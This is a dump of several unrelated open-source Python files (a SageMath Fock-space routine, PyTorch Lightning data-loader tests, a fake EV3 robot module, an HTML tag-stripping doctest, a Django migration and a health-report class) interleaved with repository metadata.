def _G_to_fock_basis(self, la, algorithm='GW'):
r"""
Return the `G` basis indexed by ``la`` in the natural basis.
EXAMPLES::
sage: G = FockSpace(3, truncated=3).G()
sage: G._G_to_fock_basis(Partition([3]))
|3> + q*|2, 1>
sage: G._G_to_fock_basis(Partition([2,1]))
|2, 1> + q*|1, 1, 1>
sage: G._G_to_fock_basis(Partition([2,1]), 'LLT')
|2, 1> + q*|1, 1, 1>
"""
fock = self.realization_of().natural()
# Special cases:
# For the empty partition
if la.size() == 0:
return fock.highest_weight_vector()
# For length k partitions
if algorithm == 'GW':
n = self.realization_of()._n
k = self.realization_of()._k
if len(la) == k:
x = la[-1]
mu = _Partitions([p - x for p in la])
def add_cols(nu):
return _Partitions([ v + x for v in list(nu) + [0]*(k - len(nu)) ])
return fock.sum_of_terms((add_cols(nu), c) for nu,c in self._G_to_fock_basis(mu))
# For critical partitions
n = self.realization_of()._n
if len(la) == k-1 and all((la[i] - la[i+1] + 1) % n == 0 for i in range(k-2)) \
and (la[-1] + 1) % n == 0:
return fock.monomial(la)
# Perform the triangular reduction
cur = self.realization_of().A(algorithm)._A_to_fock_basis(la)
s = cur.support()
s.sort() # Sort lex, which respects dominance order
s.pop() # Remove the largest
q = self.realization_of()._q
while s:
mu = s.pop()
d = cur[mu].denominator()
k = d.degree()
n = cur[mu].numerator()
if k != 0 or n.constant_coefficient() != 0:
gamma = sum(n[i] * (q**(i-k) + q**(k-i))
for i in range(min(n.degree(), k)))
gamma += n[k]
cur -= gamma * self._G_to_fock_basis(mu, algorithm)
# Add any new support elements
for x in cur.support():
if x == mu or not mu.dominates(x): # Add only things (strictly) dominated by mu
continue
for i in reversed(range(len(s))):
if not s[i].dominates(x):
s.insert(i+1, x)
break
return cur
lower_global_crystal = G
canonical = G
| 37.229242
| 106
| 0.416764
|
3c5f3d3b80dab47d9968eed116110e46d7052223
| 12,460
|
py
|
Python
|
tests/trainer/test_data_loading.py
|
eladsegal/pytorch-lightning
|
7b4df7bf919acfd7f7b39d780faeadb54aec9ade
|
[
"Apache-2.0"
] | 3
|
2021-10-04T05:08:28.000Z
|
2021-10-04T06:04:06.000Z
|
tests/trainer/test_data_loading.py
|
Programmer-RD-AI/pytorch-lightning
|
02a675241c826d7720c7e15d6fda3f5da0b28116
|
[
"Apache-2.0"
] | null | null | null |
tests/trainer/test_data_loading.py
|
Programmer-RD-AI/pytorch-lightning
|
02a675241c826d7720c7e15d6fda3f5da0b28116
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from re import escape
import pytest
from torch.utils.data import DataLoader, DistributedSampler
from torch.utils.data.sampler import BatchSampler, Sampler, SequentialSampler
from pytorch_lightning import Trainer
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.imports import _TORCH_GREATER_EQUAL_1_7
from tests.helpers import BoringModel, RandomDataset
@pytest.mark.skipif(
sys.platform == "win32" and not _TORCH_GREATER_EQUAL_1_7, reason="Bad `torch.distributed` support on Windows"
)
@pytest.mark.parametrize("mode", (1, 2, 3))
def test_replace_distributed_sampler(tmpdir, mode):
class IndexedRandomDataset(RandomDataset):
def __getitem__(self, index):
return self.data[index]
class CustomDataLoader(DataLoader):
def __init__(self, num_features, dataset, *args, **kwargs):
self.num_features = num_features
super().__init__(dataset, *args, **kwargs)
class FailureCustomDataLoader(DataLoader):
def __init__(self, num_features, dataset, *args, **kwargs):
super().__init__(dataset, *args, **kwargs)
class CustomBatchSampler(BatchSampler):
pass
class TestModel(BoringModel):
def __init__(self, numbers_test_dataloaders, mode):
super().__init__()
self._numbers_test_dataloaders = numbers_test_dataloaders
self._mode = mode
def test_step(self, batch, batch_idx, dataloader_idx=None):
return super().test_step(batch, batch_idx)
def on_test_start(self) -> None:
dataloader = self.trainer.test_dataloaders[0]
assert isinstance(dataloader, CustomDataLoader)
batch_sampler = dataloader.batch_sampler
if self._mode == 2:
assert isinstance(batch_sampler, CustomBatchSampler)
# the batch_size is set on the batch sampler
assert dataloader.batch_size is None
elif self._mode == 3:
assert type(batch_sampler) is BatchSampler
assert dataloader.batch_size == self._mode
assert batch_sampler.batch_size == self._mode
assert batch_sampler.drop_last
# the sampler has been replaced
assert isinstance(batch_sampler.sampler, DistributedSampler)
def create_dataset(self):
dataset = IndexedRandomDataset(32, 64)
if self._mode == 1:
# this case will raise an error
return FailureCustomDataLoader(32, dataset)
if self._mode == 2:
# with a custom batch sampler
batch_sampler = CustomBatchSampler(SequentialSampler(dataset), batch_size=2, drop_last=True)
return CustomDataLoader(32, dataset, batch_sampler=batch_sampler)
elif self._mode == 3:
# with no batch sampler provided
return CustomDataLoader(32, dataset, batch_size=3, drop_last=True)
def test_dataloader(self):
return [self.create_dataset()] * self._numbers_test_dataloaders
model = TestModel(2, mode)
model.test_epoch_end = None
trainer = Trainer(
default_root_dir=tmpdir, limit_test_batches=2, plugins="ddp_find_unused_parameters_false", num_processes=1
)
if mode == 1:
match = escape("missing attributes are ['num_features']")
with pytest.raises(MisconfigurationException, match=match):
trainer.test(model)
else:
trainer.test(model)
@pytest.mark.parametrize("num_workers", [0, 1])
def test_dataloader_warnings(num_workers):
class TestModel(BoringModel):
def on_train_start(self, *_) -> None:
raise SystemExit()
dl = DataLoader(RandomDataset(32, 64), num_workers=num_workers)
if hasattr(dl, "persistent_workers"):
if num_workers == 0:
warn_str = "Consider setting num_workers>0 and persistent_workers=True"
else:
warn_str = "Consider setting persistent_workers=True"
else:
warn_str = "Consider setting accelerator=ddp"
trainer = Trainer(accelerator="ddp_spawn")
with pytest.warns(UserWarning, match=warn_str), pytest.raises(SystemExit):
trainer.fit(TestModel(), dl)
def test_update_dataloader_raises():
trainer = Trainer()
with pytest.raises(ValueError, match="needs to subclass `torch.utils.data.DataLoader"):
trainer._update_dataloader(object(), object(), mode="fit")
def test_dataloaders_with_missing_keyword_arguments():
trainer = Trainer()
ds = RandomDataset(10, 20)
class TestDataLoader(DataLoader):
def __init__(self, dataset):
super().__init__(dataset)
loader = TestDataLoader(ds)
sampler = SequentialSampler(ds)
match = escape("missing arguments are ['batch_sampler', 'sampler', 'shuffle']")
with pytest.raises(MisconfigurationException, match=match):
trainer._update_dataloader(loader, sampler, mode="fit")
match = escape("missing arguments are ['batch_sampler', 'batch_size', 'drop_last', 'sampler', 'shuffle']")
with pytest.raises(MisconfigurationException, match=match):
trainer._update_dataloader(loader, sampler, mode="predict")
class TestDataLoader(DataLoader):
def __init__(self, dataset, *args, **kwargs):
super().__init__(dataset)
loader = TestDataLoader(ds)
sampler = SequentialSampler(ds)
trainer._update_dataloader(loader, sampler, mode="fit")
trainer._update_dataloader(loader, sampler, mode="predict")
class TestDataLoader(DataLoader):
def __init__(self, *foo, **bar):
super().__init__(*foo, **bar)
loader = TestDataLoader(ds)
sampler = SequentialSampler(ds)
trainer._update_dataloader(loader, sampler, mode="fit")
trainer._update_dataloader(loader, sampler, mode="predict")
class TestDataLoader(DataLoader):
def __init__(self, num_feat, dataset, *args, shuffle=False):
self.num_feat = num_feat
super().__init__(dataset)
loader = TestDataLoader(1, ds)
sampler = SequentialSampler(ds)
match = escape("missing arguments are ['batch_sampler', 'sampler']")
with pytest.raises(MisconfigurationException, match=match):
trainer._update_dataloader(loader, sampler, mode="fit")
match = escape("missing arguments are ['batch_sampler', 'batch_size', 'drop_last', 'sampler']")
with pytest.raises(MisconfigurationException, match=match):
trainer._update_dataloader(loader, sampler, mode="predict")
class TestDataLoader(DataLoader):
def __init__(self, num_feat, dataset, **kwargs):
self.feat_num = num_feat
super().__init__(dataset)
loader = TestDataLoader(1, ds)
sampler = SequentialSampler(ds)
match = escape("missing attributes are ['num_feat']")
with pytest.raises(MisconfigurationException, match=match):
trainer._update_dataloader(loader, sampler, mode="fit")
match = escape("missing attributes are ['num_feat']")
with pytest.raises(MisconfigurationException, match=match):
trainer._update_dataloader(loader, sampler, mode="predict")
def test_update_dataloader_with_multiprocessing_context():
"""This test verifies that replace_sampler conserves multiprocessing context."""
train = RandomDataset(32, 64)
context = "spawn"
train = DataLoader(train, batch_size=32, num_workers=2, multiprocessing_context=context, shuffle=True)
trainer = Trainer()
new_data_loader = trainer._update_dataloader(train, SequentialSampler(train.dataset))
assert new_data_loader.multiprocessing_context == train.multiprocessing_context
def test_dataloader_reinit_for_subclass():
class CustomDataLoader(DataLoader):
def __init__(
self,
dataset,
batch_size=1,
shuffle=False,
sampler=None,
batch_sampler=None,
num_workers=0,
collate_fn=None,
pin_memory=False,
drop_last=False,
timeout=0,
worker_init_fn=None,
dummy_kwarg=None,
):
super().__init__(
dataset,
batch_size,
shuffle,
sampler,
batch_sampler,
num_workers,
collate_fn,
pin_memory,
drop_last,
timeout,
worker_init_fn,
)
self.dummy_kwarg = dummy_kwarg
self.something_unrelated = 1
trainer = Trainer(num_processes=2, strategy="ddp_spawn")
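# prepare_dataloader should leave non-DataLoader objects untouched; DataLoader subclasses are re-instantiated
# as the same subclass so that a DistributedSampler can be injected for ddp_spawn.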
class CustomDummyObj:
sampler = None
result = trainer.prepare_dataloader(CustomDummyObj(), shuffle=True)
assert isinstance(result, CustomDummyObj), "Wrongly reinstantiated data loader"
dataset = list(range(10))
result = trainer.prepare_dataloader(CustomDataLoader(dataset), shuffle=True)
assert isinstance(result, DataLoader)
assert isinstance(result, CustomDataLoader)
assert result.dummy_kwarg is None
# Shuffled DataLoader should also work
result = trainer.prepare_dataloader(CustomDataLoader(dataset, shuffle=True), shuffle=True)
assert isinstance(result, DataLoader)
assert isinstance(result, CustomDataLoader)
assert result.dummy_kwarg is None
class CustomSampler(Sampler):
pass
# Should raise an error if existing sampler is being replaced
dataloader = CustomDataLoader(dataset, sampler=CustomSampler(dataset))
with pytest.raises(MisconfigurationException, match="will be replaced by `DistributedSampler`"):
trainer.prepare_dataloader(dataloader, shuffle=True)
def test_loader_detaching():
"""Checks that the loader has been resetted after the entrypoint."""
class LoaderTestModel(BoringModel):
def training_step(self, batch, batch_idx):
assert len(self.trainer.train_dataloader.loaders) == 10
return super().training_step(batch, batch_idx)
def validation_step(self, batch, batch_idx):
assert len(self.trainer.val_dataloaders[0]) == 10
return super().validation_step(batch, batch_idx)
def test_step(self, batch, batch_idx):
assert len(self.trainer.test_dataloaders[0]) == 10
return super().test_step(batch, batch_idx)
def predict_step(self, batch, batch_idx, dataloader_idx=None):
assert len(self.trainer.predict_dataloaders[0]) == 10
return super().predict_step(batch, batch_idx, dataloader_idx=dataloader_idx)
loader = DataLoader(RandomDataset(32, 10), batch_size=1)
model = LoaderTestModel()
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
trainer = Trainer(fast_dev_run=1)
trainer.fit(model, loader, loader)
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
trainer.validate(model, loader)
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
trainer.predict(model, loader)
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
trainer.test(model, loader)
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
| 38.695652
| 114
| 0.678652
|
d44109f3ff116788da5c2cbec9515e2c0771d9e4
| 2,233
|
py
|
Python
|
code/internal/fake_ev3.py
|
TheVinhLuong102/LEGO-Mindstorms-Dalek
|
9e341e5b94e81e9220d1229402b661fbf4d4b3f8
|
[
"MIT"
] | 1
|
2021-05-15T20:46:38.000Z
|
2021-05-15T20:46:38.000Z
|
code/internal/fake_ev3.py
|
calliecameron/lego-mindstorms-dalek
|
9e341e5b94e81e9220d1229402b661fbf4d4b3f8
|
[
"MIT"
] | 1
|
2017-01-25T11:09:33.000Z
|
2017-02-13T07:04:32.000Z
|
code/internal/fake_ev3.py
|
calliecameron/lego-mindstorms-dalek
|
9e341e5b94e81e9220d1229402b661fbf4d4b3f8
|
[
"MIT"
] | 1
|
2020-06-25T20:42:59.000Z
|
2020-06-25T20:42:59.000Z
|
"""Fake versions of some ev3dev classes, so the networking code can be tested
without having the real ev3 to hand."""
import time
import subprocess
class Motor(object):
def __init__(self, port, mtype):
super(Motor, self).__init__()
self.port = port
self.mtype = mtype
self.speed_regulation_enabled = "off"
self.stop_command = "coast"
self.speed_sp = 0
self.position = 0
self.ramp_up_sp = 0
self.ramp_down_sp = 0
def stop(self):
self.msg("stop")
def run_forever(self):
self.msg("run_forever")
def reset(self):
self.msg("reset")
def msg(self, s):
print "[%sMotor %s] %s" % (self.mtype, self.port, s)
class LargeMotor(Motor):
def __init__(self, port):
super(LargeMotor, self).__init__(port, "Large")
class MediumMotor(Motor):
def __init__(self, port):
super(MediumMotor, self).__init__(port, "Medium")
class TouchSensor(object):
def __init__(self, port):
super(TouchSensor, self).__init__()
self.port = port
def value(self):
return 0
class PowerSupply(object):
def __init__(self):
super(PowerSupply, self).__init__()
self.measured_volts = 8
class Leds(object):
def __init__(self, port):
super(Leds, self).__init__()
time.sleep(1)
self.port = port
self.brightness = 0
self.off()
print "Created LEDs"
def get_brightness(self):
return self.brightness
def set_brightness(self, brightness):
brightness = int(brightness)
if brightness < 0:
brightness = 0
elif brightness > 100:
brightness = 100
self.brightness = brightness
print "[LEDs %s] brightness %d" % (self.port, self.brightness)
if self.brightness > 0:
subprocess.call(["xset", "led", "named", "Scroll Lock"])
else:
subprocess.call(["xset", "-led", "named", "Scroll Lock"])
def on(self):
self.set_brightness(100)
def off(self):
self.set_brightness(0)
def toggle(self):
if self.get_brightness() > 0:
self.off()
else:
self.on()
| 25.089888
| 77
| 0.586207
|
12bb92daf151e0875a987e023495027dca0419ad
| 703
|
py
|
Python
|
GDLC/tests/test_destroy_tags.py
|
ptoche/Gran-Diccionari-de-la-llengua-catalana-Kindle-Edition-
|
a31412d2a6f05a6c1a9bd9854cdd6fee8abd65f4
|
[
"BSD-3-Clause"
] | 1
|
2022-02-01T16:08:03.000Z
|
2022-02-01T16:08:03.000Z
|
GDLC/tests/test_destroy_tags.py
|
ptoche/Gran-Diccionari-de-la-llengua-catalana-Kindle-Edition-
|
a31412d2a6f05a6c1a9bd9854cdd6fee8abd65f4
|
[
"BSD-3-Clause"
] | null | null | null |
GDLC/tests/test_destroy_tags.py
|
ptoche/Gran-Diccionari-de-la-llengua-catalana-Kindle-Edition-
|
a31412d2a6f05a6c1a9bd9854cdd6fee8abd65f4
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Strip tags from a BeautifulSoup object:
>>> from GDLC.GDLC import *
>>> dml = '''\
... <html>
... <head>
... <title>TITLE</title>
... <script>This text is inside an invalid tag</script>
... </head>
... <body>
... <p>This text is inside a valid tag</p><style>Invalid!</style><invalid>Invalid!</invalid>
... </body>
... </html>'''
>>> soup = BeautifulSoup(dml, features = 'lxml')
>>> print(destroy_tags(soup))
<html>
<head>
<title>TITLE</title>
</head>
<body>
<p>This text is inside a valid tag</p><invalid>Invalid!</invalid>
</body>
</html>
>>> print(destroy_tags(soup, 'invalid'))
<html>
<head>
<title>TITLE</title>
</head>
<body>
<p>This text is inside a valid tag</p></body>
</html>
"""
| 19.527778
| 94
| 0.614509
|
c7c7c0f5272b91acabc8d591f59b2e7408654e6d
| 474
|
py
|
Python
|
contact/migrations/0003_contactcaptchaformfield_hide_label.py
|
djangulo/integralpsychology.life
|
941e6c1ad1f274d7489d8ecdea5ae72f4889cc4b
|
[
"MIT"
] | null | null | null |
contact/migrations/0003_contactcaptchaformfield_hide_label.py
|
djangulo/integralpsychology.life
|
941e6c1ad1f274d7489d8ecdea5ae72f4889cc4b
|
[
"MIT"
] | null | null | null |
contact/migrations/0003_contactcaptchaformfield_hide_label.py
|
djangulo/integralpsychology.life
|
941e6c1ad1f274d7489d8ecdea5ae72f4889cc4b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-10 15:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('contact', '0002_auto_20181010_1446'),
]
operations = [
migrations.AddField(
model_name='contactcaptchaformfield',
name='hide_label',
field=models.BooleanField(default=False),
),
]
| 22.571429
| 53
| 0.635021
|
5d4b1a9baeb19b38e5e01a9ae86a1e3d2dc75eb4
| 3,049
|
py
|
Python
|
custom/up_nrhm/reports/asha_facilitators_report.py
|
bglar/commcare-hq
|
972129fc26864c08c7bef07874bd2a7218550bff
|
[
"BSD-3-Clause"
] | 1
|
2017-02-10T03:14:51.000Z
|
2017-02-10T03:14:51.000Z
|
custom/up_nrhm/reports/asha_facilitators_report.py
|
bglar/commcare-hq
|
972129fc26864c08c7bef07874bd2a7218550bff
|
[
"BSD-3-Clause"
] | null | null | null |
custom/up_nrhm/reports/asha_facilitators_report.py
|
bglar/commcare-hq
|
972129fc26864c08c7bef07874bd2a7218550bff
|
[
"BSD-3-Clause"
] | null | null | null |
from corehq.apps.reports.datatables import DataTablesHeader, DataTablesColumn
from corehq.apps.reports.generic import GenericTabularReport
from corehq.apps.reports.sqlreport import DataFormatter, TableDataFormat
from corehq.apps.reports.standard import CustomProjectReport, DatespanMixin
from corehq.apps.reports.filters.dates import DatespanFilter
from custom.up_nrhm.filters import DrillDownOptionFilter
from custom.up_nrhm.sql_data import ASHAFacilitatorsData
class ASHAFacilitatorsReport(GenericTabularReport, DatespanMixin, CustomProjectReport):
fields = [DatespanFilter, DrillDownOptionFilter]
name = "ASHA Facilitators Report"
slug = "asha_facilitators_report"
show_all_rows = True
default_rows = 20
use_datatables = False
printable = True
LEFT_COLUMN_NAMES = [
"Total number of ASHAs under the Facilitator",
"Newborn visits within first day of birth in case of home deliveries",
"Set of home visits for newborn care as specified in the HBNC guidelines "
"(six visits in case of Institutional delivery and seven in case of a home delivery)",
"Attending VHNDs/Promoting immunization",
"Supporting institutional delivery",
"Management of childhood illness - especially diarrhea and pneumonia",
"Household visits with nutrition counseling",
"Fever cases seen/malaria slides made in malaria endemic area",
"Acting as DOTS provider",
"Holding or attending village/VHSNC meeting",
"Successful referral of the IUD, "
"Female sterilization or male sterilization cases and/or providing OCPs/Condoms",
"Total number of ASHAs who are functional on at least 6/10 tasks"
]
@property
def report_config(self):
return {
'domain': self.domain,
'startdate': self.datespan.startdate,
'enddate': self.datespan.enddate,
'af': self.request.GET.get('hierarchy_af'),
'count_one': 1,
'sixty_percents': 60
}
@property
def model(self):
return ASHAFacilitatorsData(config=self.report_config)
@property
def headers(self):
return DataTablesHeader(
DataTablesColumn("", sortable=False),
DataTablesColumn("Total no. of ASHAs functional"),
DataTablesColumn("Total no. of ASHAs who did not report/not known"),
DataTablesColumn("Rmarks")
)
@property
def rows(self):
no_value = dict(sort_key=0L, html=0L)
model = self.model
formatter = DataFormatter(TableDataFormat(model.columns, no_value=no_value))
rows = list(formatter.format(model.data, keys=model.keys, group_by=model.group_by))
if not rows:
return []
assert len(rows) == 1
row = [row.get('sort_key') or 0L for row in rows[0]]
all_ashas = row[0]
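# Each output row is [indicator name, functional count, total ASHAs minus the functional count
# (blank for the first row, which is the total itself), remarks placeholder].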
return [[self.LEFT_COLUMN_NAMES[idx], element, all_ashas - element if idx != 0 else '', '']
for idx, element in enumerate(row)]
| 41.202703
| 99
| 0.680551
|